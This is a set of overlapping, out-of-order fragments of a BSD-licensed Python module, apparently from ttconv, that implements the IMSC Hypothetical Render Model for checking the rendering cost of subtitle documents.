"sequence of tuplets `(begin, ISD)`, where `ISD` is an ISD instance whose active",
"time: {float(stats.dur):.3f}\\n\" f\" Glyph copy count: {stats.gcpy_count} | render count: {stats.gren_count} | Background",
"if index_n == 0 or is_last_isd_empty else 1 self.isd_stats.clear = draw_area != 0",
"self._compute_dur_d(isd, index_n, is_last_isd_empty) self.isd_stats.dur = self.isd_stats.dur_t + self.isd_stats.dur_d return self.isd_stats def _compute_dur_d( self,",
"ValueError(\"Argument must be a string of length 1\") return _REN_G_CJK if 0x4E00 <=",
"THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\" AND",
"the above copyright notice, this # list of conditions and the following disclaimer.",
"= 0 is_last_isd_empty = True for doc_index, (time_offset, isd) in enumerate(isd_iterator): if time_offset",
"time_offset < last_offset: raise RuntimeError(\"ISDs are not in order of increasing offset\") stats",
"at {float(time_offset):.3f}s (doc #{doc_index})\\n\" f\" available time: {float(available_time):.3f}s | HRM time: {float(stats.dur):.3f}\\n\" f\"",
"not in order of increasing offset\") stats = hrm.next_isd(isd, doc_index, is_last_isd_empty) avail_render_time =",
"NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; # LOSS OF USE,",
"LLC # # Redistribution and use in source and binary forms, with or",
"time_offset - last_offset if stats.dur > avail_render_time: event_handler.error(\"Rendering time exceeded\", doc_index, time_offset, avail_render_time,",
"isinstance(element, ttconv.model.Text): continue parent = element.parent() nrga = _compute_nrga(element) for char in element.get_text():",
"elif glyph in self.back_buffer: self.isd_stats.dur_t += nrga / _compute_gcpy(char) self.isd_stats.ngra_t += nrga self.isd_stats.gcpy_count",
"self.isd_stats.gcpy_count += 1 else: self.isd_stats.dur_t += nrga / _compute_ren_g(char) self.isd_stats.ngra_t += nrga self.isd_stats.gren_count",
"!= 1: raise ValueError(\"Argument must be a string of length 1\") return _GCPY_BASE",
"IN CONTRACT, STRICT LIABILITY, OR TORT # (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN",
"== 0: return False if region.get_style(styles.StyleProperties.Display) is styles.DisplayType.none: return False if region.get_style(styles.StyleProperties.Visibility) is",
"styles.ColorType font_family: typing.Tuple[typing.Union[str, styles.GenericFontFamilyType]] font_size: styles.LengthType font_style: styles.FontStyleType font_weight: styles.FontWeightType text_decoration: styles.TextDecorationType text_outline:",
"_NGBS = 1 _IPD = 1 @dataclass class ISDStatistics: dur: Number = 0",
"styles.LengthType.Units.rh: raise RuntimeError(f\"Unsupported extent height units: {region_extent.height.units}\") return region_extent.width.value * region_extent.height.value / 10000",
"ISD time dur_d: Number = 0 # HRM background drawing time nbg_total: Number",
"OR CONTRIBUTORS BE LIABLE FOR # ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR",
"LIABLE FOR # ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES #",
"= True draw_area = 0 if index_n == 0 or is_last_isd_empty else 1",
"if region_extent.height.units is not styles.LengthType.Units.rh: raise RuntimeError(f\"Unsupported extent height units: {region_extent.height.units}\") return region_extent.width.value",
"+ self.isd_stats.dur_d return self.isd_stats def _compute_dur_d( self, isd: typing.Type[ttconv.isd.ISD], index_n: int, is_last_isd_empty: bool",
"if region.get_style(styles.StyleProperties.ShowBackground) is not styles.ShowBackgroundType.always: return False bg_color: styles.ColorType = region.get_style(styles.StyleProperties.BackgroundColor) if bg_color.ident",
"info(self, msg: str, doc_index: int, time_offset: Fraction, available_time: Fraction, stats: ISDStatistics): LOGGER.info(EventHandler._format_message(msg, doc_index,",
"* nbg self.isd_stats.nbg_total += nbg self.isd_stats.dur_d = draw_area / _BDRAW def _compute_dur_t( self,",
"is not None: for region in isd.iter_regions(): if not _is_presented_region(region): continue self.isd_stats.is_empty =",
"active interval starts at `begin` seconds and ends immediately before the `begin` value",
"value of the next ISD. Errors, warnings and info messages are signalled through",
"import ttconv.isd import ttconv.style_properties as styles import ttconv.model from ._gcpy_codepoints import GCPY_12 LOGGER",
"ISDStatistics): LOGGER.error(EventHandler._format_message(msg, doc_index, time_offset, available_time, stats)) def debug(self, msg: str, doc_index: int, time_offset:",
"# Total Normalized Rendered Glyph Area gcpy_count: Number = 0 # Total number",
"| HRM time: {float(stats.dur):.3f}\\n\" f\" Glyph copy count: {stats.gcpy_count} | render count: {stats.gren_count}",
"__init__(self): self.back_buffer: typing.Set[_Glyph] = set() self.isd_stats: ISDStatistics = None def next_isd( self, isd:",
"= front_buffer def _compute_nrga(element: typing.Type[ttconv.model.Text]): font_size: styles.LengthType = element.parent().get_style(styles.StyleProperties.FontSize) if font_size.units is not",
"Fraction, stats: ISDStatistics): return ( f\"{msg} at {float(time_offset):.3f}s (doc #{doc_index})\\n\" f\" available time:",
"self.isd_stats.gcpy_count += 1 elif glyph in self.back_buffer: self.isd_stats.dur_t += nrga / _compute_gcpy(char) self.isd_stats.ngra_t",
"RuntimeError(f\"Unsupported fontSize units: {font_size.units}\") return font_size.value * font_size.value / 10000 def _compute_ren_g(char: str):",
"for region in isd.iter_regions(): if not _is_presented_region(region): continue self.isd_stats.is_empty = False nbg =",
"_region_normalized_size(region) * nbg self.isd_stats.nbg_total += nbg self.isd_stats.dur_d = draw_area / _BDRAW def _compute_dur_t(",
"hrm = HRM() last_offset = 0 is_last_isd_empty = True for doc_index, (time_offset, isd)",
"= 1.2 _NGBS = 1 _IPD = 1 @dataclass class ISDStatistics: dur: Number",
"Fraction, stats: ISDStatistics): LOGGER.debug(EventHandler._format_message(msg, doc_index, time_offset, available_time, stats)) def validate(isd_iterator: typing.Iterator[typing.Tuple[Fraction, ttconv.isd.ISD]], event_handler:",
"and info messages are signalled through callbacks on the `event_handler`. ''' hrm =",
"self.isd_stats.gren_count += 1 front_buffer.add(glyph) self.back_buffer = front_buffer def _compute_nrga(element: typing.Type[ttconv.model.Text]): font_size: styles.LengthType =",
"stats: ISDStatistics): return ( f\"{msg} at {float(time_offset):.3f}s (doc #{doc_index})\\n\" f\" available time: {float(available_time):.3f}s",
"def warn(self, msg: str, doc_index: int, time_offset: Fraction, available_time: Fraction, stats: ISDStatistics): LOGGER.warning(EventHandler._format_message(msg,",
"region_extent.width.value * region_extent.height.value / 10000 def _is_presented_region(region: typing.Type[ttconv.isd.ISD.Region]): '''See https://www.w3.org/TR/ttml-imsc1.1/#dfn-presented-region ''' if region.get_style(styles.StyleProperties.Opacity)",
"ARE # DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE",
"region_extent.height.units is not styles.LengthType.Units.rh: raise RuntimeError(f\"Unsupported extent height units: {region_extent.height.units}\") return region_extent.width.value *",
"-> NO # should transparent backgrounds really be counted? -> NO # should",
"= 0 # Total number of glyphs rendered is_empty: bool = False #",
"are not in order of increasing offset\") stats = hrm.next_isd(isd, doc_index, is_last_isd_empty) avail_render_time",
"# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE",
"doc_index, time_offset, available_time, stats)) def debug(self, msg: str, doc_index: int, time_offset: Fraction, available_time:",
"self._compute_dur_t(isd, index_n) self._compute_dur_d(isd, index_n, is_last_isd_empty) self.isd_stats.dur = self.isd_stats.dur_t + self.isd_stats.dur_d return self.isd_stats def",
"{float(stats.dur):.3f}\\n\" f\" Glyph copy count: {stats.gcpy_count} | render count: {stats.gren_count} | Background draw",
"element.parent() nrga = _compute_nrga(element) for char in element.get_text(): glyph = _Glyph( char=char, color=parent.get_style(styles.StyleProperties.Color),",
"else: self.isd_stats.dur_t += nrga / _compute_ren_g(char) self.isd_stats.ngra_t += nrga self.isd_stats.gren_count += 1 front_buffer.add(glyph)",
"GOODS OR SERVICES; # LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)",
"string of length 1\") return _GCPY_BASE if ord(char) in GCPY_12 else _GCPY_OTHER def",
"events that occur during processing. Typically overridden by the caller. ''' @staticmethod def",
"CONTRIBUTORS BE LIABLE FOR # ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL",
"text_decoration=parent.get_style(styles.StyleProperties.TextDecoration), text_outline=parent.get_style(styles.StyleProperties.TextOutline), text_shadow=parent.get_style(styles.StyleProperties.TextShadow), background_color=parent.get_style(styles.StyleProperties.BackgroundColor) ) if glyph in front_buffer: self.isd_stats.dur_t += nrga /",
"| Clear: {stats.clear}\\n\" ) def info(self, msg: str, doc_index: int, time_offset: Fraction, available_time:",
"styles.TextOutlineType text_shadow: styles.TextShadowType background_color: styles.ColorType class HRM: def __init__(self): self.back_buffer: typing.Set[_Glyph] = set()",
"list of conditions and the following disclaimer. # 2. Redistributions in binary form",
"INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES # (INCLUDING, BUT NOT LIMITED TO,",
"int, time_offset: Fraction, available_time: Fraction, stats: ISDStatistics): return ( f\"{msg} at {float(time_offset):.3f}s (doc",
"= False # Whether the root container had to be cleared dur_t: Number",
"`begin` seconds and ends immediately before the `begin` value of the next ISD.",
"if 0x4E00 <= ord(char) <= 0x9FFF else _REN_G_OTHER def _compute_gcpy(char: str): if len(char)",
"( f\"{msg} at {float(time_offset):.3f}s (doc #{doc_index})\\n\" f\" available time: {float(available_time):.3f}s | HRM time:",
"UTF-8 -*- # Copyright (c) 2021, Pearl TV LLC # # Redistribution and",
"AND # ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE",
"of increasing offset\") stats = hrm.next_isd(isd, doc_index, is_last_isd_empty) avail_render_time = _IPD if doc_index",
"event_handler.error(\"NGBS exceeded\", doc_index, time_offset, avail_render_time, stats) event_handler.debug(\"Processed document\", doc_index, time_offset, avail_render_time, stats) if",
"IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED # WARRANTIES OF MERCHANTABILITY",
"int, is_last_isd_empty: bool ): self.isd_stats.is_empty = True draw_area = 0 if index_n ==",
"# should br really be included -> no if isinstance(element, ttconv.model.Br): continue bg_color",
"SUCH DAMAGE. '''Hypothetical Render Model (HRM)''' __author__ = \"<NAME> <<EMAIL>>\" import typing from",
"def info(self, msg: str, doc_index: int, time_offset: Fraction, available_time: Fraction, stats: ISDStatistics): LOGGER.info(EventHandler._format_message(msg,",
"stats: ISDStatistics): LOGGER.debug(EventHandler._format_message(msg, doc_index, time_offset, available_time, stats)) def validate(isd_iterator: typing.Iterator[typing.Tuple[Fraction, ttconv.isd.ISD]], event_handler: typing.Type[EventHandler]=EventHandler()):",
"''' hrm = HRM() last_offset = 0 is_last_isd_empty = True for doc_index, (time_offset,",
"THE IMPLIED # WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE",
"avail_render_time = _IPD if doc_index == 0 else time_offset - last_offset if stats.dur",
"> 1: event_handler.error(\"NGBS exceeded\", doc_index, time_offset, avail_render_time, stats) event_handler.debug(\"Processed document\", doc_index, time_offset, avail_render_time,",
"if isinstance(element, ttconv.model.Br): continue bg_color = element.get_style(styles.StyleProperties.BackgroundColor) if bg_color is not None: if",
"return False if region.has_children(): return True if region.get_style(styles.StyleProperties.ShowBackground) is not styles.ShowBackgroundType.always: return False",
"False if region.has_children(): return True if region.get_style(styles.StyleProperties.ShowBackground) is not styles.ShowBackgroundType.always: return False bg_color:",
"typing.Type[EventHandler]=EventHandler()): '''Determines whether the sequence of ISDs returned by `isd_iterator` conform to the",
"def debug(self, msg: str, doc_index: int, time_offset: Fraction, available_time: Fraction, stats: ISDStatistics): LOGGER.debug(EventHandler._format_message(msg,",
"use in source and binary forms, with or without # modification, are permitted",
"doc_index: int, time_offset: Fraction, available_time: Fraction, stats: ISDStatistics): LOGGER.warning(EventHandler._format_message(msg, doc_index, time_offset, available_time, stats))",
"gren_count: Number = 0 # Total number of glyphs rendered is_empty: bool =",
"if isd is not None: for region in isd.iter_regions(): if not _is_presented_region(region): continue",
"self.isd_stats.dur = self.isd_stats.dur_t + self.isd_stats.dur_d return self.isd_stats def _compute_dur_d( self, isd: typing.Type[ttconv.isd.ISD], index_n:",
"\"AS IS\" AND # ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED",
"isd: typing.Type[ttconv.isd.ISD], index_n: int, is_last_isd_empty: bool ): self.isd_stats.is_empty = True draw_area = 0",
"= 0 for element in region.dfs_iterator(): # should body elements really be excluded?",
"if glyph in front_buffer: self.isd_stats.dur_t += nrga / _compute_gcpy(char) self.isd_stats.gcpy_count += 1 elif",
"must reproduce the above copyright notice, # this list of conditions and the",
"that occur during processing. Typically overridden by the caller. ''' @staticmethod def _format_message(msg:",
") -> ISDStatistics: self.isd_stats = ISDStatistics() self._compute_dur_t(isd, index_n) self._compute_dur_d(isd, index_n, is_last_isd_empty) self.isd_stats.dur =",
"= draw_area / _BDRAW def _compute_dur_t( self, isd: typing.Type[ttconv.isd.ISD], _index_n: int ): front_buffer",
"system: {bg_color.ident}\") if bg_color.components[3] != 0: nbg += 1 draw_area += _region_normalized_size(region) *",
"is_last_isd_empty): last_offset = time_offset is_last_isd_empty = stats.is_empty @dataclass(frozen=True) class _Glyph: char: str color",
"0 # Total number of glyphs copied gren_count: Number = 0 # Total",
"= set() if isd is not None: for region in isd.iter_regions(): if not",
"return True if region.get_style(styles.StyleProperties.ShowBackground) is not styles.ShowBackgroundType.always: return False bg_color: styles.ColorType = region.get_style(styles.StyleProperties.BackgroundColor)",
"self.back_buffer = front_buffer def _compute_nrga(element: typing.Type[ttconv.model.Text]): font_size: styles.LengthType = element.parent().get_style(styles.StyleProperties.FontSize) if font_size.units is",
"doc_index: int, time_offset: Fraction, available_time: Fraction, stats: ISDStatistics): LOGGER.error(EventHandler._format_message(msg, doc_index, time_offset, available_time, stats))",
"disclaimer in the documentation # and/or other materials provided with the distribution. #",
"/ _compute_gcpy(char) self.isd_stats.ngra_t += nrga self.isd_stats.gcpy_count += 1 else: self.isd_stats.dur_t += nrga /",
"units: {region_extent.height.units}\") return region_extent.width.value * region_extent.height.value / 10000 def _is_presented_region(region: typing.Type[ttconv.isd.ISD.Region]): '''See https://www.w3.org/TR/ttml-imsc1.1/#dfn-presented-region",
"EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. '''Hypothetical Render Model (HRM)'''",
"notice, this # list of conditions and the following disclaimer. # 2. Redistributions",
"#{doc_index})\\n\" f\" available time: {float(available_time):.3f}s | HRM time: {float(stats.dur):.3f}\\n\" f\" Glyph copy count:",
"0 else time_offset - last_offset if stats.dur > avail_render_time: event_handler.error(\"Rendering time exceeded\", doc_index,",
"dataclass from fractions import Fraction from numbers import Number import logging import ttconv.isd",
"is_last_isd_empty: bool ): self.isd_stats.is_empty = True draw_area = 0 if index_n == 0",
"!= 0: nbg += 1 draw_area += _region_normalized_size(region) * nbg self.isd_stats.nbg_total += nbg",
"element in region.dfs_iterator(): if not isinstance(element, ttconv.model.Text): continue parent = element.parent() nrga =",
"ISDStatistics = None def next_isd( self, isd: typing.Type[ttconv.isd.ISD], index_n: int, is_last_isd_empty: bool )",
"_compute_dur_d( self, isd: typing.Type[ttconv.isd.ISD], index_n: int, is_last_isd_empty: bool ): self.isd_stats.is_empty = True draw_area",
"a string of length 1\") return _GCPY_BASE if ord(char) in GCPY_12 else _GCPY_OTHER",
"'''See https://www.w3.org/TR/ttml-imsc1.1/#dfn-presented-region ''' if region.get_style(styles.StyleProperties.Opacity) == 0: return False if region.get_style(styles.StyleProperties.Display) is styles.DisplayType.none:",
"SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. '''Hypothetical Render Model",
"(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF",
"# 2. Redistributions in binary form must reproduce the above copyright notice, #",
"bool = False # Does the ISD contain any content class EventHandler: '''Allows",
"contain any content class EventHandler: '''Allows a callee to inform the caller of",
"dur: Number = 0 # HRM ISD time dur_d: Number = 0 #",
"ttconv.model from ._gcpy_codepoints import GCPY_12 LOGGER = logging.getLogger(__name__) _BDRAW = 12 _GCPY_BASE =",
"render count: {stats.gren_count} | Background draw count: {stats.nbg_total} | Clear: {stats.clear}\\n\" ) def",
"0 is_last_isd_empty = True for doc_index, (time_offset, isd) in enumerate(isd_iterator): if time_offset <",
"time_offset is_last_isd_empty = stats.is_empty @dataclass(frozen=True) class _Glyph: char: str color : styles.ColorType font_family:",
"LOGGER.info(EventHandler._format_message(msg, doc_index, time_offset, available_time, stats)) def warn(self, msg: str, doc_index: int, time_offset: Fraction,",
"typing.Type[ttconv.isd.ISD], index_n: int, is_last_isd_empty: bool ) -> ISDStatistics: self.isd_stats = ISDStatistics() self._compute_dur_t(isd, index_n)",
"root container had to be cleared dur_t: Number = 0 # HRM text",
"be counted? -> NO # should span and br really be included ->",
"else time_offset - last_offset if stats.dur > avail_render_time: event_handler.error(\"Rendering time exceeded\", doc_index, time_offset,",
"span and br really be included -> yes for now # should br",
"0x4E00 <= ord(char) <= 0x9FFF else _REN_G_OTHER def _compute_gcpy(char: str): if len(char) !=",
"RuntimeError(f\"Unsupported extent width units: {region_extent.width.units}\") if region_extent.height.units is not styles.LengthType.Units.rh: raise RuntimeError(f\"Unsupported extent",
"index_n: int, is_last_isd_empty: bool ): self.isd_stats.is_empty = True draw_area = 0 if index_n",
"# should span and br really be included -> yes for now #",
"numbers import Number import logging import ttconv.isd import ttconv.style_properties as styles import ttconv.model",
"AND CONTRIBUTORS \"AS IS\" AND # ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT",
"OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED # WARRANTIES OF",
"str, doc_index: int, time_offset: Fraction, available_time: Fraction, stats: ISDStatistics): LOGGER.error(EventHandler._format_message(msg, doc_index, time_offset, available_time,",
"region.get_style(styles.StyleProperties.Visibility) is styles.DisplayType.none: return False if region.has_children(): return True if region.get_style(styles.StyleProperties.ShowBackground) is not",
"'''Hypothetical Render Model (HRM)''' __author__ = \"<NAME> <<EMAIL>>\" import typing from dataclasses import",
"+= _region_normalized_size(region) * nbg self.isd_stats.nbg_total += nbg self.isd_stats.dur_d = draw_area / _BDRAW def",
"* font_size.value / 10000 def _compute_ren_g(char: str): if len(char) != 1: raise ValueError(\"Argument",
"{bg_color.ident}\") if bg_color.components[3] != 0: nbg += 1 draw_area += _region_normalized_size(region) * nbg",
"+= nrga / _compute_gcpy(char) self.isd_stats.ngra_t += nrga self.isd_stats.gcpy_count += 1 else: self.isd_stats.dur_t +=",
"isd is not None: for region in isd.iter_regions(): if not _is_presented_region(region): continue self.isd_stats.is_empty",
"in region.dfs_iterator(): if not isinstance(element, ttconv.model.Text): continue parent = element.parent() nrga = _compute_nrga(element)",
"in the documentation # and/or other materials provided with the distribution. # #",
"+= 1 front_buffer.add(glyph) self.back_buffer = front_buffer def _compute_nrga(element: typing.Type[ttconv.model.Text]): font_size: styles.LengthType = element.parent().get_style(styles.StyleProperties.FontSize)",
"the sequence of ISDs returned by `isd_iterator` conform to the IMSC HRM. `isd_iterator`",
"_BDRAW = 12 _GCPY_BASE = 12 _GCPY_OTHER = 3 _REN_G_CJK = 0.6 _REN_G_OTHER",
"bg_color.ident is not styles.ColorType.Colorimetry.RGBA8: raise RuntimeError(f\"Unsupported colorimetry system: {bg_color.ident}\") if bg_color.components[3] == 0:",
"glyph in front_buffer: self.isd_stats.dur_t += nrga / _compute_gcpy(char) self.isd_stats.gcpy_count += 1 elif glyph",
"is not styles.ShowBackgroundType.always: return False bg_color: styles.ColorType = region.get_style(styles.StyleProperties.BackgroundColor) if bg_color.ident is not",
"nbg = 0 for element in region.dfs_iterator(): # should body elements really be",
"if region.get_style(styles.StyleProperties.Opacity) == 0: return False if region.get_style(styles.StyleProperties.Display) is styles.DisplayType.none: return False if",
"12 _GCPY_BASE = 12 _GCPY_OTHER = 3 _REN_G_CJK = 0.6 _REN_G_OTHER = 1.2",
"_format_message(msg: str, doc_index: int, time_offset: Fraction, available_time: Fraction, stats: ISDStatistics): return ( f\"{msg}",
"DAMAGES # (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;",
"whose active interval starts at `begin` seconds and ends immediately before the `begin`",
"self.isd_stats.dur_d return self.isd_stats def _compute_dur_d( self, isd: typing.Type[ttconv.isd.ISD], index_n: int, is_last_isd_empty: bool ):",
"drawing time nbg_total: Number = 0 # Number of backgrounds drawn clear: bool",
"before the `begin` value of the next ISD. Errors, warnings and info messages",
"= element.parent() nrga = _compute_nrga(element) for char in element.get_text(): glyph = _Glyph( char=char,",
"nrga = _compute_nrga(element) for char in element.get_text(): glyph = _Glyph( char=char, color=parent.get_style(styles.StyleProperties.Color), font_family=parent.get_style(styles.StyleProperties.FontFamily),",
"/ 10000 def _is_presented_region(region: typing.Type[ttconv.isd.ISD.Region]): '''See https://www.w3.org/TR/ttml-imsc1.1/#dfn-presented-region ''' if region.get_style(styles.StyleProperties.Opacity) == 0: return",
"the above copyright notice, # this list of conditions and the following disclaimer",
"styles.ColorType.Colorimetry.RGBA8: raise RuntimeError(f\"Unsupported colorimetry system: {bg_color.ident}\") if bg_color.components[3] != 0: nbg += 1",
"Pearl TV LLC # # Redistribution and use in source and binary forms,",
"OWNER OR CONTRIBUTORS BE LIABLE FOR # ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,",
"RuntimeError(\"ISDs are not in order of increasing offset\") stats = hrm.next_isd(isd, doc_index, is_last_isd_empty)",
"def _compute_dur_t( self, isd: typing.Type[ttconv.isd.ISD], _index_n: int ): front_buffer = set() if isd",
"= 0.6 _REN_G_OTHER = 1.2 _NGBS = 1 _IPD = 1 @dataclass class",
"{stats.gren_count} | Background draw count: {stats.nbg_total} | Clear: {stats.clear}\\n\" ) def info(self, msg:",
"_compute_gcpy(char) self.isd_stats.gcpy_count += 1 elif glyph in self.back_buffer: self.isd_stats.dur_t += nrga / _compute_gcpy(char)",
"styles.LengthType.Units.rh: raise RuntimeError(f\"Unsupported fontSize units: {font_size.units}\") return font_size.value * font_size.value / 10000 def",
"available_time: Fraction, stats: ISDStatistics): LOGGER.info(EventHandler._format_message(msg, doc_index, time_offset, available_time, stats)) def warn(self, msg: str,",
"exceeded\", doc_index, time_offset, avail_render_time, stats) if stats.ngra_t > 1: event_handler.error(\"NGBS exceeded\", doc_index, time_offset,",
"must be a string of length 1\") return _REN_G_CJK if 0x4E00 <= ord(char)",
"# HRM background drawing time nbg_total: Number = 0 # Number of backgrounds",
"_is_presented_region(region): continue for element in region.dfs_iterator(): if not isinstance(element, ttconv.model.Text): continue parent =",
"False nbg = 0 for element in region.dfs_iterator(): # should body elements really",
"# -*- coding: UTF-8 -*- # Copyright (c) 2021, Pearl TV LLC #",
"1 @dataclass class ISDStatistics: dur: Number = 0 # HRM ISD time dur_d:",
"styles.TextDecorationType text_outline: styles.TextOutlineType text_shadow: styles.TextShadowType background_color: styles.ColorType class HRM: def __init__(self): self.back_buffer: typing.Set[_Glyph]",
"draw_area / _BDRAW def _compute_dur_t( self, isd: typing.Type[ttconv.isd.ISD], _index_n: int ): front_buffer =",
"typing.Type[ttconv.isd.ISD], _index_n: int ): front_buffer = set() if isd is not None: for",
"self.back_buffer: typing.Set[_Glyph] = set() self.isd_stats: ISDStatistics = None def next_isd( self, isd: typing.Type[ttconv.isd.ISD],",
"# and/or other materials provided with the distribution. # # THIS SOFTWARE IS",
"OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND # ON",
"= 0 if index_n == 0 or is_last_isd_empty else 1 self.isd_stats.clear = draw_area",
"== 0 else time_offset - last_offset if stats.dur > avail_render_time: event_handler.error(\"Rendering time exceeded\",",
"stats)) def warn(self, msg: str, doc_index: int, time_offset: Fraction, available_time: Fraction, stats: ISDStatistics):",
"CONSEQUENTIAL DAMAGES # (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR",
"styles.GenericFontFamilyType]] font_size: styles.LengthType font_style: styles.FontStyleType font_weight: styles.FontWeightType text_decoration: styles.TextDecorationType text_outline: styles.TextOutlineType text_shadow: styles.TextShadowType",
"ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. '''Hypothetical Render Model (HRM)''' __author__ =",
"front_buffer.add(glyph) self.back_buffer = front_buffer def _compute_nrga(element: typing.Type[ttconv.model.Text]): font_size: styles.LengthType = element.parent().get_style(styles.StyleProperties.FontSize) if font_size.units",
"exceeded\", doc_index, time_offset, avail_render_time, stats) event_handler.debug(\"Processed document\", doc_index, time_offset, avail_render_time, stats) if not",
"DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND # ON ANY THEORY",
"document\", doc_index, time_offset, avail_render_time, stats) if not (stats.is_empty and is_last_isd_empty): last_offset = time_offset",
"where `ISD` is an ISD instance whose active interval starts at `begin` seconds",
"def error(self, msg: str, doc_index: int, time_offset: Fraction, available_time: Fraction, stats: ISDStatistics): LOGGER.error(EventHandler._format_message(msg,",
"Clear: {stats.clear}\\n\" ) def info(self, msg: str, doc_index: int, time_offset: Fraction, available_time: Fraction,",
"IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. '''Hypothetical Render Model (HRM)''' __author__",
"DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES # (INCLUDING, BUT NOT LIMITED",
"copyright notice, this # list of conditions and the following disclaimer. # 2.",
"import GCPY_12 LOGGER = logging.getLogger(__name__) _BDRAW = 12 _GCPY_BASE = 12 _GCPY_OTHER =",
"# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE",
"doc_index, (time_offset, isd) in enumerate(isd_iterator): if time_offset < last_offset: raise RuntimeError(\"ISDs are not",
"error(self, msg: str, doc_index: int, time_offset: Fraction, available_time: Fraction, stats: ISDStatistics): LOGGER.error(EventHandler._format_message(msg, doc_index,",
"10000 def _is_presented_region(region: typing.Type[ttconv.isd.ISD.Region]): '''See https://www.w3.org/TR/ttml-imsc1.1/#dfn-presented-region ''' if region.get_style(styles.StyleProperties.Opacity) == 0: return False",
"time_offset, available_time, stats)) def validate(isd_iterator: typing.Iterator[typing.Tuple[Fraction, ttconv.isd.ISD]], event_handler: typing.Type[EventHandler]=EventHandler()): '''Determines whether the sequence",
"OF SUCH DAMAGE. '''Hypothetical Render Model (HRM)''' __author__ = \"<NAME> <<EMAIL>>\" import typing",
"OF THIS # SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.",
"THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\" AND # ANY EXPRESS OR IMPLIED",
"styles.TextShadowType background_color: styles.ColorType class HRM: def __init__(self): self.back_buffer: typing.Set[_Glyph] = set() self.isd_stats: ISDStatistics",
"offset\") stats = hrm.next_isd(isd, doc_index, is_last_isd_empty) avail_render_time = _IPD if doc_index == 0",
"text_shadow: styles.TextShadowType background_color: styles.ColorType class HRM: def __init__(self): self.back_buffer: typing.Set[_Glyph] = set() self.isd_stats:",
"be included -> no if isinstance(element, ttconv.model.Br): continue bg_color = element.get_style(styles.StyleProperties.BackgroundColor) if bg_color",
"is styles.DisplayType.none: return False if region.has_children(): return True if region.get_style(styles.StyleProperties.ShowBackground) is not styles.ShowBackgroundType.always:",
"extent width units: {region_extent.width.units}\") if region_extent.height.units is not styles.LengthType.Units.rh: raise RuntimeError(f\"Unsupported extent height",
"A PARTICULAR PURPOSE ARE # DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER",
"in region.dfs_iterator(): # should body elements really be excluded? -> NO # should",
"POSSIBILITY OF SUCH DAMAGE. '''Hypothetical Render Model (HRM)''' __author__ = \"<NAME> <<EMAIL>>\" import",
"typing.Type[ttconv.model.Text]): font_size: styles.LengthType = element.parent().get_style(styles.StyleProperties.FontSize) if font_size.units is not styles.LengthType.Units.rh: raise RuntimeError(f\"Unsupported fontSize",
"region.dfs_iterator(): # should body elements really be excluded? -> NO # should transparent",
"continue bg_color = element.get_style(styles.StyleProperties.BackgroundColor) if bg_color is not None: if bg_color.ident is not",
"with the distribution. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS",
"Rendered Glyph Area gcpy_count: Number = 0 # Total number of glyphs copied",
"available_time: Fraction, stats: ISDStatistics): LOGGER.debug(EventHandler._format_message(msg, doc_index, time_offset, available_time, stats)) def validate(isd_iterator: typing.Iterator[typing.Tuple[Fraction, ttconv.isd.ISD]],",
"time_offset, available_time, stats)) def warn(self, msg: str, doc_index: int, time_offset: Fraction, available_time: Fraction,",
"_IPD if doc_index == 0 else time_offset - last_offset if stats.dur > avail_render_time:",
"or is_last_isd_empty else 1 self.isd_stats.clear = draw_area != 0 if isd is not",
"debug(self, msg: str, doc_index: int, time_offset: Fraction, available_time: Fraction, stats: ISDStatistics): LOGGER.debug(EventHandler._format_message(msg, doc_index,",
"styles import ttconv.model from ._gcpy_codepoints import GCPY_12 LOGGER = logging.getLogger(__name__) _BDRAW = 12",
"and binary forms, with or without # modification, are permitted provided that the",
"conditions and the following disclaimer in the documentation # and/or other materials provided",
"from dataclasses import dataclass from fractions import Fraction from numbers import Number import",
"font_weight: styles.FontWeightType text_decoration: styles.TextDecorationType text_outline: styles.TextOutlineType text_shadow: styles.TextShadowType background_color: styles.ColorType class HRM: def",
"1: raise ValueError(\"Argument must be a string of length 1\") return _REN_G_CJK if",
